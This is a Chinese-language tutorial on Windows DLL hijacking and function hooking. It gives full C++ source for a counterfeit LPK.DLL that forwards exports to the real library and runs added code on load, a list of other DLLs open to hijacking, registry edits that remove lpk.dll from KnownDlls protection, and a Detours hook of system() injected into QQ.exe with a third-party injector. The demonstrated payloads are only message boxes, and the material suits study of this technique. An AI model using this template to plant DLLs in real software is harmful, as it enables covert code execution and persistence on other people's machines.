Dll注入技术之劫持注入

测试环境

系统:Windows 7 32bit

工具:FileCleaner2.0 和 lpk.dll

主要思路

利用Window可以先加载当前目录下的dll特性,仿造系统的LPK.DLL,让应用程序先加载我们的伪LPK.DLL,然后在我们的dll中去调用原来系统的原函数.

引用网络中的原理讲解

●背景知识●

首先我们要了解Windows为什么可以DLL劫持呢？主要是因为Windows的资源共享机制。为了尽可能多得安排资源共享，微软建议多个应用程序共享的任何模块应该放在Windows的系统目录中，如kernel32.dll，这样能够方便找到。但是随着时间的推移，安装程序会用旧文件或者未向后兼容的新文件来替换系统目录下的文件，这样会使一些其他的应用程序无法正确执行，因此，微软改变了策略，建议应用程序将所有文件放到自己的目录中去，而不要去碰系统目录下的任何东西。
为了提供这样的功能，在Window2000开始，微软加了一个特性，强制操作系统的加载程序首先从应用程序目录中加载模块，只有当加载程序无法在应用程序目录中找到文件，才搜索其他目录。利用系统的这个特性，就可以使应用程序强制加载我们指定的DLL做一些特殊的工作。
举个例子来说吧，Windows的系统目录下有一个名为LPK.DLL的系统文件，程序运行时会在c:\Windows\system32文件夹下找到这个DLL文件并加载它。如打开记事本程序，用360的进程管理工具可以显示记事本进程加载的所有模块，如图1所示。

图1 记事本加载的所有模块
 

可以看到记事本加载了c:\Windows\system32\LPK.DLL。

●什么是DLL劫持●

根据前面说的Windows资源共享机制，操作系统加载程序首先从应用程序目录中加载模块。这一特性在注册表中也有体现：HKLM\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode，如果为1，搜索的顺序为：应用程序所在目录->系统目录（用GetSystemDirectory获取）->16位系统目录->Windows目录（用GetWindowsDirectory获取）->运行程序的当前目录->PATH环境变量，如果为0，搜索顺序为：应用程序所在目录->运行程序的当前目录->系统目录（用GetSystemDirectory获取）->16位系统目录->Windows目录（用GetWindowsDirectory获取）->PATH环境变量。Windows Server 2003默认值为1，Windows XP/2000默认值为0或者没有这个键值。但是不管是哪种情况，第一个搜索的肯定是应用程序的所在目录，这样就有机会让应用程序去加载我们的DLL。如果这个DLL和系统目录下的某个DLL同名，导出表也相同，功能就是加载系统目录下的那个DLL，并且将导出表转发到那个真实的DLL。这时DLL劫持就发生了。可以看出，构造一个符合上面要求的DLL，再将其放在可执行文件的目录即可轻松实现DLL劫持了。

●DLL劫持的实现●

这一步我们的工作就是通过编程来实现一个LPK.DLL文件，它与系统目录下的LPK.DLL导出表相同，并能加载系统目录下的LPK.DLL，并且能将导出表转发到真实的LPK.DLL。可以看出我们要实现的这个DLL需求如下：
1、构造一个与系统目录下LPK.DLL一样的导出表；
2、加载系统目录下的LPK.DLL；
3、将导出函数转发到系统目录下的LPK.DLL上；

4、在初始化函数中加入我们要执行的代码。

主要代码

实现伪造的LPK.DLL

//
// LPK.DLL劫持注入源码
//


// 头文件
#include "stdafx.h"
#include <Windows.h>
#include <process.h>




// 导出函数
#pragma comment(linker, "/EXPORT:LpkInitialize=_AheadLib_LpkInitialize,@1")
#pragma comment(linker, "/EXPORT:LpkTabbedTextOut=_AheadLib_LpkTabbedTextOut,@2")
#pragma comment(linker, "/EXPORT:LpkDllInitialize=_AheadLib_LpkDllInitialize,@3")
#pragma comment(linker, "/EXPORT:LpkDrawTextEx=_AheadLib_LpkDrawTextEx,@4")
//#pragma comment(linker, "/EXPORT:LpkEditControl=_AheadLib_LpkEditControl,@5")
#pragma comment(linker, "/EXPORT:LpkExtTextOut=_AheadLib_LpkExtTextOut,@6")
#pragma comment(linker, "/EXPORT:LpkGetCharacterPlacement=_AheadLib_LpkGetCharacterPlacement,@7")
#pragma comment(linker, "/EXPORT:LpkGetTextExtentExPoint=_AheadLib_LpkGetTextExtentExPoint,@8")
#pragma comment(linker, "/EXPORT:LpkPSMTextOut=_AheadLib_LpkPSMTextOut,@9")
#pragma comment(linker, "/EXPORT:LpkUseGDIWidthCache=_AheadLib_LpkUseGDIWidthCache,@10")
#pragma comment(linker, "/EXPORT:ftsWordBreak=_AheadLib_ftsWordBreak,@11")





// 宏定义
#define EXTERNC extern "C"
#define NAKED __declspec(naked)
#define EXPORT __declspec(dllexport)

#define ALCPP EXPORT NAKED
#define ALSTD EXTERNC EXPORT NAKED void __stdcall
#define ALCFAST EXTERNC EXPORT NAKED void __fastcall
#define ALCDECL EXTERNC NAKED void __cdecl

//LpkEditControl导出的是数组，不是单一的函数（by Backer）
EXTERNC void __cdecl AheadLib_LpkEditControl(void);
EXTERNC __declspec(dllexport) void(*LpkEditControl[14])() = { AheadLib_LpkEditControl };

  
//添加全局变量

  


// AheadLib 命名空间
namespace AheadLib
{
	HMODULE m_hModule = NULL;	// 原始模块句柄

	// 加载原始模块
	inline BOOL WINAPI Load()
	{
		TCHAR tzPath[MAX_PATH];
		TCHAR tzTemp[MAX_PATH * 2];

		GetSystemDirectory(tzPath, MAX_PATH);
		lstrcat(tzPath, TEXT("\\lpk.dll"));
		m_hModule = LoadLibrary(tzPath);
		if (m_hModule == NULL)
		{
			wsprintf(tzTemp, TEXT("无法加载 %s，程序无法正常运行。"), tzPath);
			MessageBox(NULL, tzTemp, TEXT("AheadLib"), MB_ICONSTOP);
		};
		//MessageBox(NULL, "原始模块加载成功", TEXT("AheadLib"), MB_ICONSTOP);
		return (m_hModule != NULL);
	}

	// 释放原始模块
	inline VOID WINAPI Free()
	{
		if (m_hModule)
		{
			FreeLibrary(m_hModule);
		}
	}

	// 获取原始函数地址
	FARPROC WINAPI GetAddress(PCSTR pszProcName)
	{
		FARPROC fpAddress;
		CHAR szProcName[16];
		TCHAR tzTemp[MAX_PATH];

		fpAddress = GetProcAddress(m_hModule, pszProcName);
		if (fpAddress == NULL)
		{
			if (HIWORD(pszProcName) == 0)
			{
				wsprintfA(szProcName, "%d", pszProcName);
				pszProcName = szProcName;
			}

			wsprintf(tzTemp, TEXT("无法找到函数 %hs，程序无法正常运行。"), pszProcName);
			MessageBox(NULL, tzTemp, TEXT("AheadLib"), MB_ICONSTOP);
			ExitProcess(-2);
		}

		return fpAddress;
	}
}
using namespace AheadLib;
  

  
//函数声明
void WINAPIV InitInject(LPVOID pParam);
//自己添加功能的函数
void WINAPIV InitInject(LPVOID pParam)
{
	//在这里可以添加自己的DLL
	//LoadLibrary(TEXT(".\\MyDll.dll"));
	MessageBox(NULL, TEXT("LPK劫持成功"), TEXT("警告"),NULL);
	return;
}
  



// 入口函数
BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
	if (dwReason == DLL_PROCESS_ATTACH)
	{
		DisableThreadLibraryCalls(hModule);
		if (Load())
		{
			//LpkEditControl这个数组有14个成员，必须将其复制过来    
			memcpy((LPVOID)(LpkEditControl + 1), (LPVOID)((int*)GetAddress("LpkEditControl") + 1), 52);
			_beginthread(InitInject, NULL, NULL);//创建新线程实现自己的功能
		}
		else {
			//	MessageBox(NULL, "初始化失败", "123 ERROR", MB_ICONSTOP);
			return FALSE;
		}

	}
	else if (dwReason == DLL_PROCESS_DETACH)
	{
		Free();
	}
	return TRUE;
}





// 导出函数
ALCDECL AheadLib_LpkInitialize(void)
{
	GetAddress("LpkInitialize");
	__asm JMP EAX;
}





// 导出函数
ALCDECL AheadLib_LpkTabbedTextOut(void)
{
	GetAddress("LpkTabbedTextOut");
	__asm JMP EAX;
}





// 导出函数
ALCDECL AheadLib_LpkDllInitialize(void)
{
	GetAddress("LpkDllInitialize");
	__asm JMP EAX;
}





// 导出函数
ALCDECL AheadLib_LpkDrawTextEx(void)
{
	GetAddress("LpkDrawTextEx");
	__asm JMP EAX;
}





// 导出函数
ALCDECL AheadLib_LpkEditControl(void)
{
	GetAddress("LpkEditControl");
	__asm jmp DWORD ptr[EAX];//这里的LpkEditControl是数组，eax存的是函数指针
}





// 导出函数
ALCDECL AheadLib_LpkExtTextOut(void)
{
	GetAddress("LpkExtTextOut");
	__asm JMP EAX;
}





// 导出函数
ALCDECL AheadLib_LpkGetCharacterPlacement(void)
{
	GetAddress("LpkGetCharacterPlacement");
	__asm JMP EAX;
}





// 导出函数
ALCDECL AheadLib_LpkGetTextExtentExPoint(void)
{
	GetAddress("LpkGetTextExtentExPoint");
	__asm JMP EAX;
}





// 导出函数
ALCDECL AheadLib_LpkPSMTextOut(void)
{
	GetAddress("LpkPSMTextOut");
	__asm JMP EAX;
}





// 导出函数
ALCDECL AheadLib_LpkUseGDIWidthCache(void)
{
	GetAddress("LpkUseGDIWidthCache");
	__asm JMP EAX;
}





// 导出函数
ALCDECL AheadLib_ftsWordBreak(void)
{
	GetAddress("ftsWordBreak");
	__asm JMP EAX;
}

实现效果

把伪造的LPK.DLL放在程序同目录下(这样会首先加载我们伪造的DLL)
注:可能需要修改注册表，使得程序从执行文件所在目录加载DLL(修改完可能需要重启)
有些高版本系统和程序已经不能劫持lpk.dll了,这里我用了"黑客反病毒论坛"的FileCleaner2.0.exe程序测试成功!
其他可劫持的dll为:
lpk.dll、winmm.dll、ws2_32.dll、ws2help.dll、version.dll、usp10.dll、msimg32.dll、midimap.dll、ksuser.dll、comres.dll、ddraw.dll等
XP:
把HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SessionManager\knowndlls下的lpk项删除掉，重启电脑。
WIN7:
在HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SessionManager添加一个键值ExcludeFromKnownDlls（多字符串类型），把lpk.dll加进去。如果需要其他DLL请自行加入。

如图：

查看我们伪造的LPK.DLL导出表,与系统原来的一样

运行程序后先加载了我们伪造的LPK.DLL,程序被劫持

从模块列表中也可以看到,既加载了我们伪造的LPK.DLL,也加载了系统的lpk.dll

目录

劫持

detours

实现劫持

步骤：

1. 安装Detours

2. 编译Detours工程

3. 把静态库和头文件引入工程

4. 函数指针与函数的定义

5.拦截

劫持QQ

实现劫持system函数。

1. 设置项目生成dll

2. 源文件（注意：需要保存为.c文件，或者加上extern C，因为detours是使用C语言实现的，表示代码使用C的规则进行编译） 

3. 生成"劫持1.dll"文件

4. 把dll注入到QQ.exe

5. 拦截QQ执行system函数

参考

---

劫持

• 劫持的原理就是把目标函数的指针的指向修改为自定义函数的地址。
• 函数是放在内存中的代码区，所以劫持与代码区密切相关。
• 实现劫持需要使用detours。

detours

• detours是微软亚洲研究院出口的信息安全产品，主要用于劫持。这个工具使用C语言实现，所以是跨平台的。
• detours根据函数指针改变函数的行为，可以拦截任何函数，即使操作系统函数。

detours下载地址：
下载地址1： http://research.microsoft.com/en-us/downloads/d36340fb-4d3c-4ddd-bf5b-1db25d03713d/default.aspx
下载地址2： http://pan.baidu.com/s/1eQEijtS

实现劫持

开发环境说明：win7、vs2012

步骤：

1. 安装Detours

2. 编译Detours工程

在安装目录C:\Program Files\Microsoft Research\Detours Express 3.0\src目录下的是工程的源文件。

        (1) 打开VS2012命令行工具，进入src目录。

        (2) 使用nmake（linux下是make）命令编译生成静态库。

         (3) 在lib.x86目录下的.lib文件是win32平台下的静态库文件

         (4) 在include目录下的是Detours工程的头文件

3. 把静态库和头文件引入工程

// 引入detours头文件
#include "detours.h"
 
// 引入detours.lib静态库
#pragma comment(lib,"detours.lib")

4. 函数指针与函数的定义

        (1) 定义一个函数指针指向目标函数，这里目标函数是system

        例如：

        detour在realse模式生效（因为VS在Debug模式下已经把程序中的函数劫持了）

static int ( *oldsystem)(const char * _Command) = system;//定义一个函数指针指向目标函数

        (2) 定义与目标函数原型相同的函数替代目标函数

        例如：

//3.定义新的函数替代目标函数,需要与目标函数的原型相同
int newsystem(const char * _Command){
		
	int result = MessageBoxA(0,"是否允许该程序调用system命令","提示",1);
	//printf("result = %d", result);
	if (result == 1)
	{
		oldsystem(_Command); //调用旧的函数
	}else{
		MessageBoxA(0,"终止调用system命令","提示",0);
	}
	return 0;
}

5.拦截

//开始拦截
void Hook()
{
    DetourRestoreAfterWith();//恢复原来状态（重置）
    DetourTransactionBegin();//拦截开始
    DetourUpdateThread(GetCurrentThread());//刷新当前线程（刷新生效）
    //这里可以连续多次调用DetourAttach，表明HOOK多个函数
    DetourAttach((void **)&oldsystem, newsystem);//实现函数拦截
    DetourTransactionCommit();//拦截生效
}

//取消拦截
void UnHook()
{
    DetourTransactionBegin();//拦截开始
    DetourUpdateThread(GetCurrentThread());//刷新当前线程
    //这里可以连续多次调用DetourDetach,表明撤销多个函数HOOK
    DetourDetach((void **)&oldsystem, newsystem); //撤销拦截函数
    DetourTransactionCommit();//拦截生效
}

劫持QQ

实现劫持system函数。

1. 设置项目生成dll

2. 源文件（注意：需要保存为.c文件，或者加上extern C，因为detours是使用C语言实现的，表示代码使用C的规则进行编译） 

#include  
#include     
#include 
      
       
// 引入detours头文件
#include "detours.h"

//1.引入detours.lib静态库
#pragma comment(lib,"detours.lib")

//2.定义函数指针
static int ( *oldsystem)(const char * _Command) = system;//定义一个函数指针指向目标函数

//3.定义新的函数替代目标函数,需要与目标函数的原型相同
int newsystem(const char * _Command){
	
	char cmd[100] = {0};
	int result = 0;
	sprintf_s(cmd,100, "是否允许该程序执行%s指令", _Command);

	result = MessageBoxA(0,cmd,"提示",1);
	//printf("result = %d", result);
	if (result == 1) // 允许调用
	{
		oldsystem(_Command); //调用旧的函数
	}else{
		// 不允许调用
	}
	return 0;
}

// 4.拦截
//开始拦截
_declspec(dllexport) void Hook()  // _declspec(dllexport)表示外部可调用，需要加上该关键字其它进程才能成功调用该函数
{
	DetourRestoreAfterWith();//恢复原来状态（重置）
	DetourTransactionBegin();//拦截开始
	DetourUpdateThread(GetCurrentThread());//刷新当前线程（刷新生效）
	//这里可以连续多次调用DetourAttach，表明HOOK多个函数

	DetourAttach((void **)&oldsystem, newsystem);//实现函数拦截

	DetourTransactionCommit();//拦截生效
}


//取消拦截
_declspec(dllexport) void UnHook()
{
	DetourTransactionBegin();//拦截开始
	DetourUpdateThread(GetCurrentThread());//刷新当前线程
	//这里可以连续多次调用DetourDetach,表明撤销多个函数HOOK
	DetourDetach((void **)&oldsystem, newsystem); //撤销拦截函数
	DetourTransactionCommit();//拦截生效
}

// 劫持别人的程序：通过DLL注入，并调用Hook函数实现劫持。
// 劫持系统：通过DLL注入系统程序（如winlogon.exe）实现劫持系统函数。

_declspec(dllexport)  void main(){
	Hook(); // 拦截
	system("tasklist"); //弹出提示框
	UnHook(); // 解除拦截
	system("ipconfig"); //成功执行
	system("pause"); // 成功执行
}

3. 生成"劫持1.dll"文件

4. 把dll注入到QQ.exe

DLL注入工具下载： https://coding.net/u/linchaolong/p/DllInjector/git/raw/master/Xenos.exe
        (1) 打开dll注入工具，点击add，选择"劫持1.dll"

        (2) 在Process中选择QQ.exe，点击Inject进行注入。

        (3) 点击菜单栏Tools，选择Eject modules显示当前QQ.exe进程中加载的所有模块，如果有"劫持1.dll"表示注入成功。

5. 拦截QQ执行system函数

        (1) 点击Advanced，在Init routine中填写动态库（dll）中的函数的名称，如Hook，然后点击Inject进行调用。此时，我们已经把system函数劫持了。
        (2) 点击Advanced，在Init routine中填写main，执行动态库中的main函数。

         此时，弹出一个对话框，问是否允许执行tasklist指令，表示成功把system函数拦截下来了。

参考

DLL注入工具源码地址： https://coding.net/u/linchaolong/p/DllInjector/git
说明：
该工具来自以下两个项目
Xenos： https://github.com/DarthTon/Xenos.git
Blackbone： https://github.com/DarthTon/Blackbone